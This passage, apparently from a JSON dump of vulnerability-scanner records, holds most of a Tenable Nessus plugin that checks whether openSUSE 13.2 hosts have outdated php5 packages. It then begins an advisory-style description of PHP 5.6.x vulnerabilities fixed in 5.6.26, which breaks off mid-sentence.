value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=999682\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=999684\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=999685\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=999819\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=999820\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php5 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-firebird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-firebird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mssql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-opcache-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-phar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-phar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"apache2-mod_php5-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"apache2-mod_php5-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-bcmath-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-bcmath-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-bz2-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-bz2-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-calendar-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-calendar-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ctype-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ctype-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-curl-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-curl-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-dba-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-dba-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-debugsource-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-devel-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-dom-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-dom-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-enchant-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-enchant-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-exif-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-exif-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fastcgi-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fastcgi-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fileinfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fileinfo-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-firebird-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-firebird-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fpm-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fpm-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ftp-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ftp-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gd-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gd-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gettext-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gettext-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gmp-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gmp-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-iconv-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-iconv-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-imap-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-imap-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-intl-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-intl-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-json-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-json-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ldap-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ldap-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mbstring-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mbstring-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mcrypt-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mcrypt-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mssql-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mssql-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mysql-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mysql-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-odbc-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-odbc-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-opcache-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-opcache-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-openssl-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-openssl-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pcntl-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pcntl-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pdo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pdo-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pear-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pgsql-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pgsql-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-phar-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-phar-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-posix-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-posix-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pspell-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pspell-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-readline-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-readline-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-shmop-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-shmop-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-snmp-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-snmp-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-soap-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-soap-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sockets-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sockets-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sqlite-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sqlite-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-suhosin-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-suhosin-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvmsg-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvmsg-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvsem-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvsem-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvshm-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvshm-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-tidy-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-tidy-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-tokenizer-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-tokenizer-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-wddx-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-wddx-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlreader-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlreader-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlrpc-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlrpc-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlwriter-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlwriter-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xsl-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xsl-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-zip-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-zip-debuginfo-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-zlib-5.6.1-78.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-zlib-debuginfo-5.6.1-78.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_php5 / apache2-mod_php5-debuginfo / php5 / php5-bcmath / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:27:28", "description": "According to its banner, the version of PHP running on the remote web server is 5.6.x prior to 5.6.26. It is, therefore, affected by multiple vulnerabilities :\n\n - A flaw exists in ext/standard/var_unserializer.re when destroying deserialized objects due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, via a deserialize call that references a partially constructed object, to corrupt memory, resulting in a denial of service condition. (CVE-2016-7411)\n\n - An heap buffer overflow condition exists in the php_mysqlnd_rowp_read_text_protocol_aux() function within file ext/mysqlnd/mysqlnd_wireprotocol.c due to a failure to verify that a BIT field has the UNSIGNED_FLAG flag. An unauthenticated, remote attacker can exploit this, via specially crafted field metadata, to cause a denial of service condition. (CVE-2016-7412)\n\n - A use-after-free error exists in the wddx_stack_destroy() function within file ext/wddx/wddx.c when deserializing recordset elements.\n An unauthenticated, remote attacker can exploit this, via a specially crafted wddxPacket XML document, to cause a denial of service condition. (CVE-2016-7413)\n\n - An out-of-bounds access error exists in the phar_parse_zipfile() function within file ext/phar/zip.c due to a failure to ensure that the uncompressed_filesize field is large enough. An unauthenticated, remote attacker can exploit this, via a specially crafted archive, to cause a denial of service condition. (CVE-2016-7414)\n\n - A stack-based buffer overflow condition exists in the ICU4C library, specifically within file common/locid.cpp in the msgfmt_format_message() function, due to a failure to properly restrict the locale length provided to the Locale class. An unauthenticated, remote attacker can exploit this, via a long first argument to a MessageFormatter::formatMessage() function call, to cause a denial of service condition. (CVE-2016-7416)\n\n - A flaw exists in the spl_array_get_dimension_ptr_ptr() function within file ext/spl/spl_array.c due to a failure to properly validate the return value and data type when deserializing SplArray. An unauthenticated, remote attacker can exploit this, via specially crafted serialized data, to cause a denial of service condition.\n (CVE-2016-7417)\n\n - An out-of-bounds read error exists in the php_wddx_push_element() function within file ext/wddx/wddx.c when handling an incorrect boolean element, which leads to mishandling the wddx_deserialize() call. An unauthenticated, remote attacker can exploit this, 